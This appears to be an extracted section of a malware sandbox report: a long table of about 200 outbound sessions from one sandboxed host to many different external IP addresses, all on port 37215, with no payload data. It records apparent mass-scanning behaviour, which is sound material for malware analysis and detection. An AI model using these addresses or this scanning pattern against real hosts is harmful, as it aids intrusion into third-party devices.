                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3085192.168.2.1553376197.50.129.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3086192.168.2.1547396197.130.103.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3087192.168.2.1537968197.247.183.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3088192.168.2.1534338197.132.252.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3089192.168.2.1537844197.121.44.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3090192.168.2.1557906197.58.255.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3091192.168.2.1556422197.97.219.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3092192.168.2.1550410197.36.185.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3093192.168.2.1556492197.229.53.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3094192.168.2.1558706197.150.209.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3095192.168.2.1543542197.180.13.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3096192.168.2.1534382197.216.68.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3097192.168.2.1535750197.139.140.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3098192.168.2.1560666197.18.127.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3099192.168.2.1545324197.49.8.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3100192.168.2.1560356197.253.40.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3101192.168.2.1551204197.140.153.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3102192.168.2.1549114156.232.103.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3103192.168.2.1536356156.223.209.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3104192.168.2.1557176156.10.100.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3105192.168.2.1539790156.138.144.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3106192.168.2.1546284156.36.252.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3107192.168.2.1552224156.45.60.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3108192.168.2.1538452156.76.24.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3109192.168.2.1552106156.9.227.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3110192.168.2.1535674156.137.9.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3111192.168.2.1548900156.91.253.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3112192.168.2.1547102156.115.15.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3113192.168.2.1543082156.185.182.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3114192.168.2.1550722156.119.94.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3115192.168.2.1543710156.33.120.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3116192.168.2.1560986156.155.34.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3117192.168.2.1555550156.202.227.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3118192.168.2.1546646156.62.224.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3119192.168.2.1553268156.103.163.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3120192.168.2.1554646156.141.15.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3121192.168.2.1540186156.126.99.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3122192.168.2.1540900156.157.220.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3123192.168.2.1547396156.107.55.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3124192.168.2.1544588156.183.245.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3125192.168.2.1547846156.214.239.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3126192.168.2.1538336156.159.24.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3127192.168.2.1535330156.232.10.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3128192.168.2.1535844156.141.198.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3129192.168.2.1542530156.221.65.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3130192.168.2.1543442156.176.18.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3131192.168.2.1540124156.53.229.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3132192.168.2.1540964156.63.19.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3133192.168.2.1555282156.252.202.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3134192.168.2.1535100156.254.249.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3135192.168.2.1540116156.126.93.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3136192.168.2.1544860156.18.214.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3137192.168.2.1553116156.113.187.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3138192.168.2.1553752156.120.141.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3139192.168.2.1553186156.27.133.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3140192.168.2.1558122156.129.135.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3141192.168.2.1549846156.107.11.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3142192.168.2.1538474156.113.100.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3143192.168.2.1545338156.104.126.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3144192.168.2.1541494156.252.133.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3145192.168.2.1549240156.89.170.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3146192.168.2.1541620156.122.133.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3147192.168.2.1539718156.87.53.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3148192.168.2.1551668156.167.220.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3149192.168.2.1535170156.190.12.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3150192.168.2.1555406156.37.39.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3151192.168.2.1544620156.18.13.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3152192.168.2.1543318156.17.31.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3153192.168.2.1554266156.117.83.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3154192.168.2.1541108156.177.23.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3155192.168.2.1549384156.174.178.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3156192.168.2.1547106156.116.191.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3157192.168.2.1537818156.33.82.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3158192.168.2.1542974156.109.36.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3159192.168.2.1555668156.14.150.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3160192.168.2.1557914156.62.160.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3161192.168.2.1556666156.187.227.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3162192.168.2.1535218156.8.24.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3163192.168.2.1533530156.39.239.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3164192.168.2.1553564156.216.8.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3165192.168.2.1536604156.127.20.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3166192.168.2.1557584156.60.104.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3167192.168.2.1533728156.245.77.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3168192.168.2.1550006156.30.130.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3169192.168.2.1549442156.104.183.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3170192.168.2.1534774156.196.178.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3171192.168.2.1560380156.108.130.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3172192.168.2.1543168156.162.2.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3173192.168.2.1551808156.44.97.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3174192.168.2.1550678156.22.168.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3175192.168.2.1534388156.42.8.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3176192.168.2.1549422156.160.153.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3177192.168.2.1537516156.101.83.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3178192.168.2.1536144156.34.139.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3179192.168.2.1551644156.48.24.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3180192.168.2.1536780156.71.45.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3181192.168.2.1537950156.194.128.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3182192.168.2.1557762156.35.10.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3183192.168.2.1551804156.157.223.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3184192.168.2.1550304156.65.142.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3185192.168.2.1551402156.23.80.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3186192.168.2.1551126156.247.152.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3187192.168.2.1547012156.88.18.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3188192.168.2.1554122156.78.239.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3189192.168.2.1551636156.213.13.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3190192.168.2.1537862156.153.245.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3191192.168.2.1546366156.76.61.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3192192.168.2.1552054156.39.28.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3193192.168.2.1553940156.44.184.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3194192.168.2.1534912156.195.201.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3195192.168.2.1542822156.12.153.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3196192.168.2.1543592156.187.68.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3197192.168.2.1536242156.167.10.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3198192.168.2.1547560156.175.122.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3199192.168.2.1546126156.110.157.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3200192.168.2.1539296156.195.34.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3201192.168.2.1543302156.60.79.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3202192.168.2.1533690156.161.4.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3203192.168.2.1549594156.36.168.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3204192.168.2.1533324156.55.227.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3205192.168.2.1552790156.179.218.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3206192.168.2.1550024156.43.252.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3207192.168.2.1532802156.237.65.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3208192.168.2.1558960156.23.208.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3209192.168.2.1545982156.44.245.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3210192.168.2.1534564156.56.237.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3211192.168.2.1554672156.137.196.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3212192.168.2.1551246156.226.118.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3213192.168.2.1538698156.248.222.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3214192.168.2.1539688156.213.60.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3215192.168.2.1548804156.246.189.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3216192.168.2.1556058156.44.157.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3217192.168.2.1540640156.64.38.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3218192.168.2.1557330156.1.84.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3219192.168.2.1543162156.91.213.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3220192.168.2.1548684156.220.231.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3221192.168.2.1553846156.119.161.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3222192.168.2.1555488156.106.150.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3223192.168.2.1555862156.80.88.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3224192.168.2.1532976156.121.205.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3225192.168.2.1549414156.217.135.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3226192.168.2.1533924156.194.236.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3227192.168.2.1534068156.44.146.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3228192.168.2.1556516156.53.48.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3229192.168.2.1536420156.124.42.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3230192.168.2.1547088156.152.4.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3231192.168.2.1551966156.57.211.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3232192.168.2.1546000156.102.16.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3233192.168.2.1553120156.204.24.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3234192.168.2.1546756156.142.1.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3235192.168.2.1547332156.33.213.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3236192.168.2.1558398156.158.190.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3237192.168.2.1553614156.194.215.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3238192.168.2.1544354156.46.19.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3239192.168.2.1544260156.113.5.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3240192.168.2.1542378156.162.7.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3241192.168.2.1541404156.152.223.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3242192.168.2.1557074156.82.78.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3243192.168.2.1543578156.145.185.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3244192.168.2.1555490156.145.58.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3245192.168.2.1537280156.74.179.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3246192.168.2.1548422156.196.128.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3247192.168.2.1541776156.60.22.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3248192.168.2.1550970156.33.180.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3249192.168.2.1541300156.33.127.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3250192.168.2.1557674156.91.91.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3251192.168.2.1535842156.90.234.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3252192.168.2.1537746156.144.75.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3253192.168.2.1560356156.91.141.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3254192.168.2.1533038156.52.145.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3255192.168.2.1535458156.28.131.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3256192.168.2.1558262156.119.5.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3257192.168.2.1540162156.39.104.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3258192.168.2.1556526156.217.83.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3259192.168.2.1560920156.53.91.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3260192.168.2.1536546156.107.112.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3261192.168.2.1550626156.97.18.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3262192.168.2.1545236156.243.156.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3263192.168.2.1553102156.80.166.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3264192.168.2.1535108156.209.120.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3265192.168.2.1540518156.41.33.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3266192.168.2.1542500156.237.154.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3267192.168.2.1538004156.67.252.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3268192.168.2.1551064156.66.109.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3269192.168.2.1542766156.120.106.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3270192.168.2.1539182156.92.206.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3271192.168.2.1543802156.242.245.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3272192.168.2.1544566156.10.65.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3273192.168.2.1541502156.198.60.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3274192.168.2.1556868156.145.110.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3275192.168.2.1550796156.145.107.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3276192.168.2.1534470156.117.64.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3277192.168.2.1536310156.81.110.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3278192.168.2.1551136156.125.11.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3279192.168.2.1551392156.127.48.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3280192.168.2.1541900156.146.98.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3281192.168.2.1551508156.104.228.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3282192.168.2.1557220156.211.29.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3283192.168.2.1551166156.139.175.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3284192.168.2.1537374156.114.99.25137215
